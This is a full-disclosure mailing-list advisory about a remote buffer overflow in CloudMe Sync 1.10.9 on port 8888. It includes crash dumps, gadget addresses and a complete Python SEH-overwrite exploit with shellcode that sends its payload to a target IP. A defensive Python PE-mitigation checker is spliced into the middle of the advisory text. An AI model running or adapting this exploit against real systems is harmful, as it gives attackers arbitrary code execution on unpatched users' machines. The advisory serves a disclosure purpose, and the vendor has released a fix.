Date: Sun, 11 Feb 2018 09:14:01 +0200
From: SecuriTeam SSD <ssd@...ondsecurity.com>
To: fulldisclosure@...lists.org
Subject: [FD] SSD Advisory – CloudMe Unauthenticated Remote Buffer Overflow

Full report: https://blogs.securiteam.com/index.php/archives/3669
Twitter: @SecuriTeam_SSD
Weibo: SecuriTeam_SSD

The following advisory describes one (1) vulnerability found in CloudMe.

CloudMe is “a file storage service operated by CloudMe AB that offers cloud
storage, file synchronization and client software. It features a blue
folder that appears on all devices with the same content, all files are
synchronized between devices.”

The vulnerability found is a buffer overflow which, when exploited, can cause
the product to execute arbitrary code.

Credit
A security researcher, hyp3rlinx, has reported this vulnerability to
Beyond Security’s SecuriTeam Secure Disclosure program.

Vendor response
The vendor has released CloudMe version 1.11.0 which addresses this
vulnerability.

Affected version
CloudMe Sync version v1.10.9 and prior

Vulnerability Details
An unauthenticated remote attacker that can connect to the “CloudMe Sync”
client application listening on port 8888 can send a malicious payload
causing a buffer overflow condition. This results in the attacker
controlling the program’s execution flow, allowing arbitrary code
execution on the victim’s PC.

The CloudMe Sync client creates a socket listening on TCP port 8888 (0x22B8):

In Qt5Core:
00564DF1   . C74424 04 B822>MOV DWORD PTR SS:[ESP+4],22B8
00564DF9   . 890424         MOV DWORD PTR SS:[ESP],EAX
00564DFC   . FF15 B8738100  CALL DWORD PTR DS:[<&Qt5Network._ZN10QTc>; Qt5Netwo._ZN10QTcpServer6listenERK12QHostAddresst

Buffer overflow condition
EIP register will be overwritten at about 1075 bytes.

EAX 00000001
ECX 76F698DA msvcrt.76F698DA
EDX 00350000
EBX 41414141
ESP 0028D470
EBP 41414141
ESI 41414141
EDI 41414141
EIP 41414141

Stack dump information
(508.524): Access violation - code c0000005 (first/second chance not available)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll -
eax=00000000 ebx=00000000 ecx=41414141 edx=778f353d esi=00000000 edi=00000000
eip=41414141 esp=00091474 ebp=00091494 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
41414141 ??              ???

Exploitation is very easy as ASLR and SafeSEH are both set to false on the
loaded modules, making the exploit portable and able to work across different
operating systems. We will therefore use a Structured Exception Handler (SEH)
overwrite for our exploit.

e.g.

6FE6909D     0x6fe6909d : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [libstdc++-6.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\libstdc++-6.dll)
00476795     0x00476795 : pop ebx # pop esi # ret 0x20 | startnull {PAGE_EXECUTE_READ} [CloudMe.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\CloudMe.exe)
61E7B7F6     0x61e7b7f6 : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [Qt5Gui.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll)
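The "ASLR: False" and "SafeSEH: False" properties reported above are read from each module's PE headers. The following Python 3 script is an added example, not part of this advisory or of CloudMe, that checks those bits directly (DllCharacteristics for ASLR/DEP/CFG, the load config SEHandlerTable for SafeSEH) so a defender can audit which modules an application ships without mitigations; build_sample_pe is a constructed minimal PE32 fixture, not a real CloudMe binary.

```python
import struct

# PE/COFF header bits: DllCharacteristics flags, plus RELOCS_STRIPPED from IMAGE_FILE_HEADER.Characteristics.
DYNAMIC_BASE, NX_COMPAT, GUARD_CF, RELOCS_STRIPPED = 0x0040, 0x0100, 0x4000, 0x0001


def rva_to_offset(rva, sections):
    """Map an RVA to a file offset; sections are (VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData)."""
    for vsize, va, raw_size, raw_ptr in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    return None


def pe_mitigations(data):
    """Report which mitigations a PE image opted into, parsed from its raw bytes."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    _, nsec, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24                                    # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]   # 0x10B = PE32, 0x20B = PE32+
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    dirs = opt + (96 if magic == 0x10B else 112)     # first IMAGE_DATA_DIRECTORY
    lc_rva, lc_size = struct.unpack_from("<II", data, dirs + 10 * 8)  # LOAD_CONFIG directory
    secs = [struct.unpack_from("<IIII", data, opt + opt_size + 40 * i + 8) for i in range(nsec)]
    # SafeSEH (PE32 only): IMAGE_LOAD_CONFIG_DIRECTORY32.SEHandlerTable at offset 64 is non-zero.
    safeseh = False
    off = rva_to_offset(lc_rva, secs) if lc_rva else None
    if magic == 0x10B and off is not None and lc_size >= 72:
        safeseh = struct.unpack_from("<I", data, off + 64)[0] != 0
    return {
        "aslr": bool(dll_chars & DYNAMIC_BASE) and not chars & RELOCS_STRIPPED,  # no relocs, no rebase
        "dep": bool(dll_chars & NX_COMPAT),
        "cfg": bool(dll_chars & GUARD_CF),
        "safeseh": safeseh,
    }


def build_sample_pe(dll_chars, seh_table_rva=0, file_chars=0x2102):
    """Constructed minimal PE32 fixture (not a real CloudMe module): one .rdata section at RVA 0x1000 / file 0x400."""
    opt = bytearray(224)                             # 96-byte PE32 header + 16 data directories
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<H", opt, 70, dll_chars)
    struct.pack_into("<II", opt, 96 + 10 * 8, 0x1000, 72)   # load config at RVA 0x1000, 72 bytes
    fh = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), file_chars)
    sec = b".rdata".ljust(8, b"\0") + struct.pack("<IIII", 0x100, 0x1000, 0x200, 0x400)
    hdr = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40) + b"PE\0\0" + fh + bytes(opt) + sec
    cfg = struct.pack("<I", 72).ljust(64, b"\0") + struct.pack("<II", seh_table_rva, 0)
    return hdr.ljust(0x400, b"\0") + cfg.ljust(0x200, b"\0")
```

Run pe_mitigations over the bytes of each DLL in an install directory to get the same per-module picture as the mona listing, without attaching a debugger.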

Exploit
import socket,struct

print 'CloudMe Sync v1.10.9'
print 'Unauthenticated Remote Buffer Overflow 0day'
print 'Discovery/credits: hyp3rlinx'
print 'apparition security\n'


#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


ip=raw_input('[+] CloudMe Target IP> ')

nseh="\xEB\x06"+"\x90"*2                #JMP
seh=struct.pack('<L',0x61e7b7f6)        #POP,POP RET
junk="A"*2232+nseh+seh+sc+"B"*5600
payload=junk+nseh+seh+sc

def PwnMe(ip,payload):
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip,8888))
    s.send(payload)
    print 'Sending buffer overflow packetz'
    raw_input()


if __name__ == '__main__':
    PwnMe(ip,payload)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
